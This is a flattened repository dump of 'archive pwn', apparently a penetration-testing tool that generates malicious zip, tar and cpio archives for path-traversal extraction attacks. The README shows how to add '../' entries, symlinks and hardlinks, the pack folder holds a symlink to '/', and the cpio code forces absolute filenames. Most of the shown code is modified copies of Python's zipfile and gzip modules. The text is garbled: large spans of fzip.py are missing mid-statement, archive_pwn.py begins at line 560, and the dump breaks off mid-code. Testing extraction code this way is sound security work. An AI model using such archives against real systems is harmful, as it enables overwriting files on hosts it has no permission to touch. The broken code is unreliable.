├── folder-to-pack ├── A │ └── C ├── B ├── symlinkA ├── symlinkB ├── symlinkRoot ├── hardlinkB └── META-INF │ ├── substrate │ └── config │ │ └── reflectionconfig.json │ ├── services │ └── java.security.Provider │ └── MANIFEST.MF ├── cpio-2.14-darwin ├── fipfile ├── __main__.py ├── _path.py └── __init__.py ├── README.rst ├── fzip.py └── archive_pwn.py /folder-to-pack/A/C: -------------------------------------------------------------------------------- 1 | C contents -------------------------------------------------------------------------------- /folder-to-pack/B: -------------------------------------------------------------------------------- 1 | B contents -------------------------------------------------------------------------------- /folder-to-pack/symlinkA: -------------------------------------------------------------------------------- 1 | A -------------------------------------------------------------------------------- /folder-to-pack/symlinkB: -------------------------------------------------------------------------------- 1 | B -------------------------------------------------------------------------------- /folder-to-pack/symlinkRoot: -------------------------------------------------------------------------------- 1 | / -------------------------------------------------------------------------------- /folder-to-pack/hardlinkB: -------------------------------------------------------------------------------- 1 | B contents -------------------------------------------------------------------------------- /cpio-2.14-darwin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pentagridsec/archive_pwn/HEAD/cpio-2.14-darwin -------------------------------------------------------------------------------- /folder-to-pack/META-INF/substrate/config/reflectionconfig.json: -------------------------------------------------------------------------------- 1 | [ 2 | { 3 | "name":"test", 4 | "allDeclaredMethods":true 5 | } 6 | ] -------------------------------------------------------------------------------- /folder-to-pack/META-INF/services/java.security.Provider: -------------------------------------------------------------------------------- 1 | org.bouncycastle.jce.provider.BouncyCastleProvider 2 | org.bouncycastle.pqc.jcajce.provider.BouncyCastlePQCProvider 3 | -------------------------------------------------------------------------------- /folder-to-pack/META-INF/MANIFEST.MF: -------------------------------------------------------------------------------- 1 | Manifest-Version: 1.0 2 | Foo-Compatibility-Version: 4 3 | Implementation-Name: yesname 4 | Implementation-Version: 1337 5 | Implementation-Vendor: Acme Org 6 | Specification-Name: yesname 7 | Specification-Vendor: Acme Org 8 | Multi-Release: true 9 | JAR-Type: Standalone 10 | Main-Class: example.StartClass 11 | SplashScreen-Image: symlinkRoot 12 | Add-Opens: java.base/java.lang 13 | -------------------------------------------------------------------------------- /fipfile/__main__.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import os 3 | from . import ZipFile, ZIP_DEFLATED 4 | 5 | 6 | def main(args=None): 7 | import argparse 8 | 9 | description = 'A simple command-line interface for zipfile module.' 10 | parser = argparse.ArgumentParser(description=description) 11 | group = parser.add_mutually_exclusive_group(required=True) 12 | group.add_argument('-l', '--list', metavar='', 13 | help='Show listing of a zipfile') 14 | group.add_argument('-e', '--extract', nargs=2, 15 | metavar=('', ''), 16 | help='Extract zipfile into target dir') 17 | group.add_argument('-c', '--create', nargs='+', 18 | metavar=('', ''), 19 | help='Create zipfile from sources') 20 | group.add_argument('-t', '--test', metavar='', 21 | help='Test if a zipfile is valid') 22 | parser.add_argument('--metadata-encoding', metavar='', 23 | help='Specify encoding of member names for -l, -e and -t') 24 | args = parser.parse_args(args) 25 | 26 | encoding = args.metadata_encoding 27 | 28 | if args.test is not None: 29 | src = args.test 30 | with ZipFile(src, 'r', metadata_encoding=encoding) as zf: 31 | badfile = zf.testzip() 32 | if badfile: 33 | print("The following enclosed file is corrupted: {!r}".format(badfile)) 34 | print("Done testing") 35 | 36 | elif args.list is not None: 37 | src = args.list 38 | with ZipFile(src, 'r', metadata_encoding=encoding) as zf: 39 | zf.printdir() 40 | 41 | elif args.extract is not None: 42 | src, curdir = args.extract 43 | with ZipFile(src, 'r', metadata_encoding=encoding) as zf: 44 | zf.extractall(curdir) 45 | 46 | elif args.create is not None: 47 | if encoding: 48 | print("Non-conforming encodings not supported with -c.", 49 | file=sys.stderr) 50 | sys.exit(1) 51 | 52 | zip_name = args.create.pop(0) 53 | files = args.create 54 | 55 | def addToZip(zf, path, zippath): 56 | if os.path.isfile(path): 57 | zf.write(path, zippath, ZIP_DEFLATED) 58 | elif os.path.isdir(path): 59 | if zippath: 60 | zf.write(path, zippath) 61 | for nm in sorted(os.listdir(path)): 62 | addToZip(zf, 63 | os.path.join(path, nm), os.path.join(zippath, nm)) 64 | # else: ignore 65 | 66 | with ZipFile(zip_name, 'w') as zf: 67 | for path in files: 68 | zippath = os.path.basename(path) 69 | if not zippath: 70 | zippath = os.path.basename(os.path.dirname(path)) 71 | if zippath in ('', os.curdir, os.pardir): 72 | zippath = '' 73 | addToZip(zf, path, zippath) 74 | 75 | 76 | if __name__ == "__main__": 77 | main() 78 | -------------------------------------------------------------------------------- /README.rst: -------------------------------------------------------------------------------- 1 | `Pentagrid `_'s ``archive pwn`` is a Python-based tool to create zip, tar and cpio archives to exploit common archive library issues and developer mistakes. 2 | 3 | .. contents:: 4 | :local: 5 | 6 | Archive pwn 7 | =========== 8 | 9 | This is just another tool to create archive formats (zip, tar, cpio only for now) which try to write outside of the current working directory when extracted. 10 | 11 | It's a very old vulnerability class where a lot of things have been written about. Just to mention some of the most similar/best known ones: 12 | 13 | - https://github.com/jwilk/traversal-archives - A tool that creates the simple examples we create here too, but with Makefiles. Supports more archive formats. 14 | - https://github.com/0xless/slip - A proper command line tool that allows configuring the payloads. Supports no cpio, but some other archive formats we don't. 15 | - https://github.com/snyk/zip-slip-vulnerability - Research about the topic 16 | - https://www.pentagrid.ch/en/blog/wind-river-vxworks-tarextract-directory-traversal-vulnerability/ - One of our advisories where we exploited VxWorks tarExtract function, the blog post deep dives a little more into the different archive vulnerabilities 17 | 18 | Our tool here is therefore not "new", but different. Advantages of this tool: 19 | 20 | - Support for hardlinks in TAR files 21 | - Includes the contents of the folder "folder-to-pack" in the archive. This is important if the attacked system first checks for the existence of certain files in the archive or even does signature checks on them (think "embedded device secure software update"). 22 | - Added some more complex examples (ideas often taken from old vulnerabilities), e.g. maximum Windows path length attacks, unicode normalisation, DoS via very deep directory 23 | - Modifiable by people who like Python, easy to add your own idea of a malicious archive. The current working directory (cwd) will be changed to the "folder-to-pack" folder by the script. You can then easily add another test case, e.g.: 24 | 25 | :: 26 | 27 | attack_name = "my_example_archive_attack" 28 | for archive in creator.create(attack_name): 29 | try: 30 | archive.add_cwd_content() # Adds the entire content of the folder "folder-to-pack" to the archive 31 | archive.add_dir("an-example-dir") # Some unpacking libraries allow omitting this line (and therefore ignore missing parent directories, see next line) 32 | archive.add_dir("an-example-dir/another-one") 33 | archive.add_dummy_file_at_path("an-example-dir/another-one/") # Adds a file according to naming convention, e.g. a file "an-example-dir/another-one/my_example_archive_attack_" 34 | archive.add_dummy_dir_at_path("an-example-dir/") # Adds a dir according to naming convention, e.g. a dir "an-example-dir/my_example_archive_attack_" 35 | archive.add_symlink("an-example-dir/another-one/A", "an-example-dir") # Adds a symlink an-example-dir/another-one/A -> an-example-dir 36 | archive.add_hardlink("an-example-dir/another-one/B", "an-example-dir") # Attention, no hardlink support for zip and cpio, will throw UnsupportedException and only create tars! 37 | archive.add_file("../hello", "darkness my old friend") # Creates an archive entry "../hello" with file content "darkness my old friend" 38 | archive.close() 39 | except UnsupportedException as e: 40 | Logger.info(e) if not 'ustar' in str(e) else "" # ustar tar archives have very limited space for filenames of certain lengths 41 | archive.close_and_remove() 42 | 43 | 44 | Please be aware, the tool creates a lot of files (last time we checked 96'314 files). 45 | 46 | Usage 47 | ===== 48 | 49 | Make sure you have Python 3 and GNU cpio installed as "cpio" command (on Intel MacOS it will fall back on the cpio-2.14-darwin binary included). Put stuff you want to pack along with the attack into the archive into "folder-to-pack". Then just run in the directory with `python3 archive_pwn.py`. It will create an "output" folder. 50 | -------------------------------------------------------------------------------- /fipfile/_path.py: -------------------------------------------------------------------------------- 1 | import io 2 | import posixpath 3 | import zipfile 4 | import itertools 5 | import contextlib 6 | import pathlib 7 | import re 8 | import fnmatch 9 | 10 | 11 | __all__ = ['Path'] 12 | 13 | 14 | def _parents(path): 15 | """ 16 | Given a path with elements separated by 17 | posixpath.sep, generate all parents of that path. 18 | 19 | >>> list(_parents('b/d')) 20 | ['b'] 21 | >>> list(_parents('/b/d/')) 22 | ['/b'] 23 | >>> list(_parents('b/d/f/')) 24 | ['b/d', 'b'] 25 | >>> list(_parents('b')) 26 | [] 27 | >>> list(_parents('')) 28 | [] 29 | """ 30 | return itertools.islice(_ancestry(path), 1, None) 31 | 32 | 33 | def _ancestry(path): 34 | """ 35 | Given a path with elements separated by 36 | posixpath.sep, generate all elements of that path 37 | 38 | >>> list(_ancestry('b/d')) 39 | ['b/d', 'b'] 40 | >>> list(_ancestry('/b/d/')) 41 | ['/b/d', '/b'] 42 | >>> list(_ancestry('b/d/f/')) 43 | ['b/d/f', 'b/d', 'b'] 44 | >>> list(_ancestry('b')) 45 | ['b'] 46 | >>> list(_ancestry('')) 47 | [] 48 | """ 49 | path = path.rstrip(posixpath.sep) 50 | while path and path != posixpath.sep: 51 | yield path 52 | path, tail = posixpath.split(path) 53 | 54 | 55 | _dedupe = dict.fromkeys 56 | """Deduplicate an iterable in original order""" 57 | 58 | 59 | def _difference(minuend, subtrahend): 60 | """ 61 | Return items in minuend not in subtrahend, retaining order 62 | with O(1) lookup. 63 | """ 64 | return itertools.filterfalse(set(subtrahend).__contains__, minuend) 65 | 66 | 67 | class InitializedState: 68 | """ 69 | Mix-in to save the initialization state for pickling. 70 | """ 71 | 72 | def __init__(self, *args, **kwargs): 73 | self.__args = args 74 | self.__kwargs = kwargs 75 | super().__init__(*args, **kwargs) 76 | 77 | def __getstate__(self): 78 | return self.__args, self.__kwargs 79 | 80 | def __setstate__(self, state): 81 | args, kwargs = state 82 | super().__init__(*args, **kwargs) 83 | 84 | 85 | class CompleteDirs(InitializedState, zipfile.ZipFile): 86 | """ 87 | A ZipFile subclass that ensures that implied directories 88 | are always included in the namelist. 89 | 90 | >>> list(CompleteDirs._implied_dirs(['foo/bar.txt', 'foo/bar/baz.txt'])) 91 | ['foo/', 'foo/bar/'] 92 | >>> list(CompleteDirs._implied_dirs(['foo/bar.txt', 'foo/bar/baz.txt', 'foo/bar/'])) 93 | ['foo/'] 94 | """ 95 | 96 | @staticmethod 97 | def _implied_dirs(names): 98 | parents = itertools.chain.from_iterable(map(_parents, names)) 99 | as_dirs = (p + posixpath.sep for p in parents) 100 | return _dedupe(_difference(as_dirs, names)) 101 | 102 | def namelist(self): 103 | names = super().namelist() 104 | return names + list(self._implied_dirs(names)) 105 | 106 | def _name_set(self): 107 | return set(self.namelist()) 108 | 109 | def resolve_dir(self, name): 110 | """ 111 | If the name represents a directory, return that name 112 | as a directory (with the trailing slash). 113 | """ 114 | names = self._name_set() 115 | dirname = name + '/' 116 | dir_match = name not in names and dirname in names 117 | return dirname if dir_match else name 118 | 119 | def getinfo(self, name): 120 | """ 121 | Supplement getinfo for implied dirs. 122 | """ 123 | try: 124 | return super().getinfo(name) 125 | except KeyError: 126 | if not name.endswith('/') or name not in self._name_set(): 127 | raise 128 | return zipfile.ZipInfo(filename=name) 129 | 130 | @classmethod 131 | def make(cls, source): 132 | """ 133 | Given a source (filename or zipfile), return an 134 | appropriate CompleteDirs subclass. 135 | """ 136 | if isinstance(source, CompleteDirs): 137 | return source 138 | 139 | if not isinstance(source, zipfile.ZipFile): 140 | return cls(source) 141 | 142 | # Only allow for FastLookup when supplied zipfile is read-only 143 | if 'r' not in source.mode: 144 | cls = CompleteDirs 145 | 146 | source.__class__ = cls 147 | return source 148 | 149 | 150 | class FastLookup(CompleteDirs): 151 | """ 152 | ZipFile subclass to ensure implicit 153 | dirs exist and are resolved rapidly. 154 | """ 155 | 156 | def namelist(self): 157 | with contextlib.suppress(AttributeError): 158 | return self.__names 159 | self.__names = super().namelist() 160 | return self.__names 161 | 162 | def _name_set(self): 163 | with contextlib.suppress(AttributeError): 164 | return self.__lookup 165 | self.__lookup = super()._name_set() 166 | return self.__lookup 167 | 168 | 169 | def _extract_text_encoding(encoding=None, *args, **kwargs): 170 | # stacklevel=3 so that the caller of the caller see any warning. 171 | return io.text_encoding(encoding, 3), args, kwargs 172 | 173 | 174 | class Path: 175 | """ 176 | A pathlib-compatible interface for zip files. 177 | 178 | Consider a zip file with this structure:: 179 | 180 | . 181 | ├── a.txt 182 | └── b 183 | ├── c.txt 184 | └── d 185 | └── e.txt 186 | 187 | >>> data = io.BytesIO() 188 | >>> zf = ZipFile(data, 'w') 189 | >>> zf.writestr('a.txt', 'content of a') 190 | >>> zf.writestr('b/c.txt', 'content of c') 191 | >>> zf.writestr('b/d/e.txt', 'content of e') 192 | >>> zf.filename = 'mem/abcde.zip' 193 | 194 | Path accepts the zipfile object itself or a filename 195 | 196 | >>> root = Path(zf) 197 | 198 | From there, several path operations are available. 199 | 200 | Directory iteration (including the zip file itself): 201 | 202 | >>> a, b = root.iterdir() 203 | >>> a 204 | Path('mem/abcde.zip', 'a.txt') 205 | >>> b 206 | Path('mem/abcde.zip', 'b/') 207 | 208 | name property: 209 | 210 | >>> b.name 211 | 'b' 212 | 213 | join with divide operator: 214 | 215 | >>> c = b / 'c.txt' 216 | >>> c 217 | Path('mem/abcde.zip', 'b/c.txt') 218 | >>> c.name 219 | 'c.txt' 220 | 221 | Read text: 222 | 223 | >>> c.read_text(encoding='utf-8') 224 | 'content of c' 225 | 226 | existence: 227 | 228 | >>> c.exists() 229 | True 230 | >>> (b / 'missing.txt').exists() 231 | False 232 | 233 | Coercion to string: 234 | 235 | >>> import os 236 | >>> str(c).replace(os.sep, posixpath.sep) 237 | 'mem/abcde.zip/b/c.txt' 238 | 239 | At the root, ``name``, ``filename``, and ``parent`` 240 | resolve to the zipfile. Note these attributes are not 241 | valid and will raise a ``ValueError`` if the zipfile 242 | has no filename. 243 | 244 | >>> root.name 245 | 'abcde.zip' 246 | >>> str(root.filename).replace(os.sep, posixpath.sep) 247 | 'mem/abcde.zip' 248 | >>> str(root.parent) 249 | 'mem' 250 | """ 251 | 252 | __repr = "{self.__class__.__name__}({self.root.filename!r}, {self.at!r})" 253 | 254 | def __init__(self, root, at=""): 255 | """ 256 | Construct a Path from a ZipFile or filename. 257 | 258 | Note: When the source is an existing ZipFile object, 259 | its type (__class__) will be mutated to a 260 | specialized type. If the caller wishes to retain the 261 | original type, the caller should either create a 262 | separate ZipFile object or pass a filename. 263 | """ 264 | self.root = FastLookup.make(root) 265 | self.at = at 266 | 267 | def __eq__(self, other): 268 | """ 269 | >>> Path(zipfile.ZipFile(io.BytesIO(), 'w')) == 'foo' 270 | False 271 | """ 272 | if self.__class__ is not other.__class__: 273 | return NotImplemented 274 | return (self.root, self.at) == (other.root, other.at) 275 | 276 | def __hash__(self): 277 | return hash((self.root, self.at)) 278 | 279 | def open(self, mode='r', *args, pwd=None, **kwargs): 280 | """ 281 | Open this entry as text or binary following the semantics 282 | of ``pathlib.Path.open()`` by passing arguments through 283 | to io.TextIOWrapper(). 284 | """ 285 | if self.is_dir(): 286 | raise IsADirectoryError(self) 287 | zip_mode = mode[0] 288 | if not self.exists() and zip_mode == 'r': 289 | raise FileNotFoundError(self) 290 | stream = self.root.open(self.at, zip_mode, pwd=pwd) 291 | if 'b' in mode: 292 | if args or kwargs: 293 | raise ValueError("encoding args invalid for binary operation") 294 | return stream 295 | # Text mode: 296 | encoding, args, kwargs = _extract_text_encoding(*args, **kwargs) 297 | return io.TextIOWrapper(stream, encoding, *args, **kwargs) 298 | 299 | @property 300 | def name(self): 301 | return pathlib.Path(self.at).name or self.filename.name 302 | 303 | @property 304 | def suffix(self): 305 | return pathlib.Path(self.at).suffix or self.filename.suffix 306 | 307 | @property 308 | def suffixes(self): 309 | return pathlib.Path(self.at).suffixes or self.filename.suffixes 310 | 311 | @property 312 | def stem(self): 313 | return pathlib.Path(self.at).stem or self.filename.stem 314 | 315 | @property 316 | def filename(self): 317 | return pathlib.Path(self.root.filename).joinpath(self.at) 318 | 319 | def read_text(self, *args, **kwargs): 320 | encoding, args, kwargs = _extract_text_encoding(*args, **kwargs) 321 | with self.open('r', encoding, *args, **kwargs) as strm: 322 | return strm.read() 323 | 324 | def read_bytes(self): 325 | with self.open('rb') as strm: 326 | return strm.read() 327 | 328 | def _is_child(self, path): 329 | return posixpath.dirname(path.at.rstrip("/")) == self.at.rstrip("/") 330 | 331 | def _next(self, at): 332 | return self.__class__(self.root, at) 333 | 334 | def is_dir(self): 335 | return not self.at or self.at.endswith("/") 336 | 337 | def is_file(self): 338 | return self.exists() and not self.is_dir() 339 | 340 | def exists(self): 341 | return self.at in self.root._name_set() 342 | 343 | def iterdir(self): 344 | if not self.is_dir(): 345 | raise ValueError("Can't listdir a file") 346 | subs = map(self._next, self.root.namelist()) 347 | return filter(self._is_child, subs) 348 | 349 | def match(self, path_pattern): 350 | return pathlib.Path(self.at).match(path_pattern) 351 | 352 | def is_symlink(self): 353 | """ 354 | Return whether this path is a symlink. Always false (python/cpython#82102). 355 | """ 356 | return False 357 | 358 | def _descendants(self): 359 | for child in self.iterdir(): 360 | yield child 361 | if child.is_dir(): 362 | yield from child._descendants() 363 | 364 | def glob(self, pattern): 365 | if not pattern: 366 | raise ValueError(f"Unacceptable pattern: {pattern!r}") 367 | 368 | matches = re.compile(fnmatch.translate(pattern)).fullmatch 369 | return ( 370 | child 371 | for child in self._descendants() 372 | if matches(str(child.relative_to(self))) 373 | ) 374 | 375 | def rglob(self, pattern): 376 | return self.glob(f'**/{pattern}') 377 | 378 | def relative_to(self, other, *extra): 379 | return posixpath.relpath(str(self), str(other.joinpath(*extra))) 380 | 381 | def __str__(self): 382 | return posixpath.join(self.root.filename, self.at) 383 | 384 | def __repr__(self): 385 | return self.__repr.format(self=self) 386 | 387 | def joinpath(self, *other): 388 | next = posixpath.join(self.at, *other) 389 | return self._next(self.root.resolve_dir(next)) 390 | 391 | __truediv__ = joinpath 392 | 393 | @property 394 | def parent(self): 395 | if not self.at: 396 | return self.filename.parent 397 | parent_at = posixpath.dirname(self.at.rstrip('/')) 398 | if parent_at: 399 | parent_at += '/' 400 | return self._next(parent_at) 401 | -------------------------------------------------------------------------------- /fzip.py: -------------------------------------------------------------------------------- 1 | """Functions that read and write gzipped files. 2 | 3 | The user of the file doesn't have to worry about the compression, 4 | but random access is not allowed.""" 5 | 6 | # based on Andrew Kuchling's minigzip.py distributed with the zlib module 7 | 8 | import struct, sys, time, os 9 | import zlib 10 | import builtins 11 | import io 12 | import _compression 13 | 14 | __all__ = ["BadGzipFile", "GzipFile", "open", "compress", "decompress"] 15 | 16 | FTEXT, FHCRC, FEXTRA, FNAME, FCOMMENT = 1, 2, 4, 8, 16 17 | 18 | READ, WRITE = 1, 2 19 | 20 | _COMPRESS_LEVEL_FAST = 1 21 | _COMPRESS_LEVEL_TRADEOFF = 6 22 | _COMPRESS_LEVEL_BEST = 9 23 | 24 | READ_BUFFER_SIZE = 128 * 1024 25 | 26 | 27 | def open(filename, mode="rb", compresslevel=_COMPRESS_LEVEL_BEST, 28 | encoding=None, errors=None, newline=None): 29 | """Open a gzip-compressed file in binary or text mode. 30 | 31 | The filename argument can be an actual filename (a str or bytes object), or 32 | an existing file object to read from or write to. 33 | 34 | The mode argument can be "r", "rb", "w", "wb", "x", "xb", "a" or "ab" for 35 | binary mode, or "rt", "wt", "xt" or "at" for text mode. The default mode is 36 | "rb", and the default compresslevel is 9. 37 | 38 | For binary mode, this function is equivalent to the GzipFile constructor: 39 | GzipFile(filename, mode, compresslevel). In this case, the encoding, errors 40 | and newline arguments must not be provided. 41 | 42 | For text mode, a GzipFile object is created, and wrapped in an 43 | io.TextIOWrapper instance with the specified encoding, error handling 44 | behavior, and line ending(s). 45 | 46 | """ 47 | if "t" in mode: 48 | if "b" in mode: 49 | raise ValueError("Invalid mode: %r" % (mode,)) 50 | else: 51 | if encoding is not None: 52 | raise ValueError("Argument 'encoding' not supported in binary mode") 53 | if errors is not None: 54 | raise ValueError("Argument 'errors' not supported in binary mode") 55 | if newline is not None: 56 | raise ValueError("Argument 'newline' not supported in binary mode") 57 | 58 | gz_mode = mode.replace("t", "") 59 | if isinstance(filename, (str, bytes, os.PathLike)): 60 | binary_file = GzipFile(filename, gz_mode, compresslevel) 61 | elif hasattr(filename, "read") or hasattr(filename, "write"): 62 | binary_file = GzipFile(None, gz_mode, compresslevel, filename) 63 | else: 64 | raise TypeError("filename must be a str or bytes object, or a file") 65 | 66 | if "t" in mode: 67 | encoding = io.text_encoding(encoding) 68 | return io.TextIOWrapper(binary_file, encoding, errors, newline) 69 | else: 70 | return binary_file 71 | 72 | def write32u(output, value): 73 | # The L format writes the bit pattern correctly whether signed 74 | # or unsigned. 75 | output.write(struct.pack("' 225 | 226 | def _init_write(self, filename): 227 | self.name = filename 228 | self.crc = zlib.crc32(b"") 229 | self.size = 0 230 | self.writebuf = [] 231 | self.bufsize = 0 232 | self.offset = 0 # Current file offset for seek(), tell(), etc 233 | 234 | def _write_gzip_header(self, compresslevel): 235 | self.fileobj.write(b'\037\213') # magic header 236 | self.fileobj.write(b'\010') # compression method 237 | try: 238 | if self.gz_tar_name: 239 | fname = self.gz_tar_name 240 | else: 241 | # RFC 1952 requires the FNAME field to be Latin-1. Do not 242 | # include filenames that cannot be represented that way. 243 | fname = os.path.basename(self.name) 244 | if not isinstance(fname, bytes): 245 | fname = fname.encode('latin-1') 246 | if fname.endswith(b'.gz'): 247 | fname = fname[:-3] 248 | except UnicodeEncodeError: 249 | fname = b'' 250 | flags = 0 251 | if fname: 252 | flags = FNAME 253 | self.fileobj.write(chr(flags).encode('latin-1')) 254 | mtime = self._write_mtime 255 | if mtime is None: 256 | mtime = time.time() 257 | write32u(self.fileobj, int(mtime)) 258 | if compresslevel == _COMPRESS_LEVEL_BEST: 259 | xfl = b'\002' 260 | elif compresslevel == _COMPRESS_LEVEL_FAST: 261 | xfl = b'\004' 262 | else: 263 | xfl = b'\000' 264 | self.fileobj.write(xfl) 265 | self.fileobj.write(b'\377') 266 | if fname: 267 | self.fileobj.write(fname + b'\000') 268 | 269 | def write(self,data): 270 | self._check_not_closed() 271 | if self.mode != WRITE: 272 | import errno 273 | raise OSError(errno.EBADF, "write() on read-only GzipFile object") 274 | 275 | if self.fileobj is None: 276 | raise ValueError("write() on closed GzipFile object") 277 | 278 | if isinstance(data, (bytes, bytearray)): 279 | length = len(data) 280 | else: 281 | # accept any data that supports the buffer protocol 282 | data = memoryview(data) 283 | length = data.nbytes 284 | 285 | if length > 0: 286 | self.fileobj.write(self.compress.compress(data)) 287 | self.size += length 288 | self.crc = zlib.crc32(data, self.crc) 289 | self.offset += length 290 | 291 | return length 292 | 293 | def read(self, size=-1): 294 | self._check_not_closed() 295 | if self.mode != READ: 296 | import errno 297 | raise OSError(errno.EBADF, "read() on write-only GzipFile object") 298 | return self._buffer.read(size) 299 | 300 | def read1(self, size=-1): 301 | """Implements BufferedIOBase.read1() 302 | 303 | Reads up to a buffer's worth of data if size is negative.""" 304 | self._check_not_closed() 305 | if self.mode != READ: 306 | import errno 307 | raise OSError(errno.EBADF, "read1() on write-only GzipFile object") 308 | 309 | if size < 0: 310 | size = io.DEFAULT_BUFFER_SIZE 311 | return self._buffer.read1(size) 312 | 313 | def peek(self, n): 314 | self._check_not_closed() 315 | if self.mode != READ: 316 | import errno 317 | raise OSError(errno.EBADF, "peek() on write-only GzipFile object") 318 | return self._buffer.peek(n) 319 | 320 | @property 321 | def closed(self): 322 | return self.fileobj is None 323 | 324 | def close(self): 325 | fileobj = self.fileobj 326 | if fileobj is None: 327 | return 328 | self.fileobj = None 329 | try: 330 | if self.mode == WRITE: 331 | fileobj.write(self.compress.flush()) 332 | write32u(fileobj, self.crc) 333 | # self.size may exceed 2 GiB, or even 4 GiB 334 | write32u(fileobj, self.size & 0xffffffff) 335 | elif self.mode == READ: 336 | self._buffer.close() 337 | finally: 338 | myfileobj = self.myfileobj 339 | if myfileobj: 340 | self.myfileobj = None 341 | myfileobj.close() 342 | 343 | def flush(self,zlib_mode=zlib.Z_SYNC_FLUSH): 344 | self._check_not_closed() 345 | if self.mode == WRITE: 346 | # Ensure the compressor's buffer is flushed 347 | self.fileobj.write(self.compress.flush(zlib_mode)) 348 | self.fileobj.flush() 349 | 350 | def fileno(self): 351 | """Invoke the underlying file object's fileno() method. 352 | 353 | This will raise AttributeError if the underlying file object 354 | doesn't support fileno(). 355 | """ 356 | return self.fileobj.fileno() 357 | 358 | def rewind(self): 359 | '''Return the uncompressed stream file position indicator to the 360 | beginning of the file''' 361 | if self.mode != READ: 362 | raise OSError("Can't rewind in write mode") 363 | self._buffer.seek(0) 364 | 365 | def readable(self): 366 | return self.mode == READ 367 | 368 | def writable(self): 369 | return self.mode == WRITE 370 | 371 | def seekable(self): 372 | return True 373 | 374 | def seek(self, offset, whence=io.SEEK_SET): 375 | if self.mode == WRITE: 376 | if whence != io.SEEK_SET: 377 | if whence == io.SEEK_CUR: 378 | offset = self.offset + offset 379 | else: 380 | raise ValueError('Seek from end not supported') 381 | if offset < self.offset: 382 | raise OSError('Negative seek in write mode') 383 | count = offset - self.offset 384 | chunk = b'\0' * 1024 385 | for i in range(count // 1024): 386 | self.write(chunk) 387 | self.write(b'\0' * (count % 1024)) 388 | elif self.mode == READ: 389 | self._check_not_closed() 390 | return self._buffer.seek(offset, whence) 391 | 392 | return self.offset 393 | 394 | def readline(self, size=-1): 395 | self._check_not_closed() 396 | return self._buffer.readline(size) 397 | 398 | 399 | def _read_exact(fp, n): 400 | '''Read exactly *n* bytes from `fp` 401 | 402 | This method is required because fp may be unbuffered, 403 | i.e. return short reads. 404 | ''' 405 | data = fp.read(n) 406 | while len(data) < n: 407 | b = fp.read(n - len(data)) 408 | if not b: 409 | raise EOFError("Compressed file ended before the " 410 | "end-of-stream marker was reached") 411 | data += b 412 | return data 413 | 414 | 415 | def _read_gzip_header(fp): 416 | '''Read a gzip header from `fp` and progress to the end of the header. 417 | 418 | Returns last mtime if header was present or None otherwise. 419 | ''' 420 | magic = fp.read(2) 421 | if magic == b'': 422 | return None 423 | 424 | if magic != b'\037\213': 425 | raise BadGzipFile('Not a gzipped file (%r)' % magic) 426 | 427 | (method, flag, last_mtime) = struct.unpack(" bytes: 552 | """ 553 | Write a simple gzip header with no extra fields. 554 | :param compresslevel: Compresslevel used to determine the xfl bytes. 555 | :param mtime: The mtime (must support conversion to a 32-bit integer). 556 | :return: A bytes object representing the gzip header. 557 | """ 558 | if mtime is None: 559 | mtime = time.time() 560 | if compresslevel == _COMPRESS_LEVEL_BEST: 561 | xfl = 2 562 | elif compresslevel == _COMPRESS_LEVEL_FAST: 563 | xfl = 4 564 | else: 565 | xfl = 0 566 | # Pack ID1 and ID2 magic bytes, method (8=deflate), header flags (no extra 567 | # fields added to header), mtime, xfl and os (255 for unknown OS). 568 | return struct.pack(" [archive] 560 | # -J,-y,-z,--lzma Compress archive with xz/bzip2/gzip/lzma 561 | # --format {odc|newc|ustar} Select archive format 562 | # List: cpio -it < [archive] 563 | # Extract: cpio -i [options] < [archive] 564 | # bsdcpio 3.5.1 - libarchive 3.5.1 zlib/1.2.11 liblzma/5.0.5 bz2lib/1.0.8 565 | 566 | # GNU cpio supports many more formats: 567 | # % ./cpio-2.14/cpio --version 568 | # cpio (GNU cpio) 2.14 569 | # Copyright (C) 2023 Free Software Foundation, Inc. 570 | # License GPLv3+: GNU GPL version 3 or later . 571 | # This is free software: you are free to change and redistribute it. 572 | # There is NO WARRANTY, to the extent permitted by law. 573 | # 574 | # Written by Phil Nelson, David MacKenzie, John Oleynick, 575 | # and Sergey Poznyakoff. 576 | 577 | # None of the python bindings of CPIO is really sufficient 578 | 579 | FILETYPE = "cpio" 580 | 581 | ABSOLUT_FILENAMES = '--absolute-filenames' 582 | CREATE_ARG = ["--create"] 583 | APPEND_ARG = ["--create", "--append"] 584 | 585 | FORMAT_ARG = "--format=" 586 | OUTPUT_ARG = '-O' 587 | ASCII_ARG = "-c" 588 | 589 | def __init__(self, gnu_cpio_binary, attack_name, format): 590 | super().__init__(attack_name) 591 | self.gnu_cpio_binary = gnu_cpio_binary 592 | self.format = format 593 | if os.path.isfile(self.get_output_path()): 594 | raise FileAlreadyExistsException(f"File already exists: {self.get_output_path()}") 595 | 596 | #self.archive_out_file = libarchive.Archive(self.get_output_path(), 'w') 597 | self.output_path = self.get_output_path() 598 | self.was_created = False 599 | self.replacements = [] 600 | self.init_logfile() 601 | 602 | def _get_command(self): 603 | cmd = [self.gnu_cpio_binary, ] 604 | cmd.extend(self._arg_create_or_append()) 605 | if self.format == "ascii": 606 | cmd.append(CustomCpioArchive.ASCII_ARG) 607 | else: 608 | cmd.append(CustomCpioArchive.FORMAT_ARG + self.format) 609 | cmd.extend([CustomCpioArchive.ABSOLUT_FILENAMES, 610 | CustomCpioArchive.OUTPUT_ARG, self.output_path]) 611 | #print(cmd) 612 | return cmd 613 | 614 | def _arg_create_or_append(self): 615 | if self.was_created: 616 | return CustomCpioArchive.APPEND_ARG 617 | else: 618 | self.was_created = True 619 | return CustomCpioArchive.CREATE_ARG 620 | 621 | def _add_nonexisting_circumvent_filtering(self, name, type, content=FILE_CONTENT, to_name=None): 622 | # type: 623 | # 0 = file 624 | # 1 = directory 625 | # 2 = symlink 626 | name_to_use = name 627 | repeat = 0 628 | success = False 629 | errors = "" 630 | while repeat < 5: 631 | # Is this file safe to create and is it then stored in the cwd? 632 | if not "/" in name and name != "." and name != "..": 633 | repeat = 99 # we do not need to replace or repeat, this is safe *ON UNIX LIKE SYSTEMS* 634 | success = True 635 | # print(f"Success: {name_to_use} is safe for CPIO {self.format} file {self.output_path}") 636 | else: 637 | repeat += 1 638 | name_to_use = ''.join(random.choices(string.ascii_lowercase + string.ascii_uppercase + string.ascii_letters, k=len(name))) 639 | shutil.copyfile(self.output_path, "/tmp/cpio-file-tmp.cpio") 640 | if type == 0: 641 | try: 642 | with open(name_to_use, "w") as f: 643 | f.write(content) 644 | except 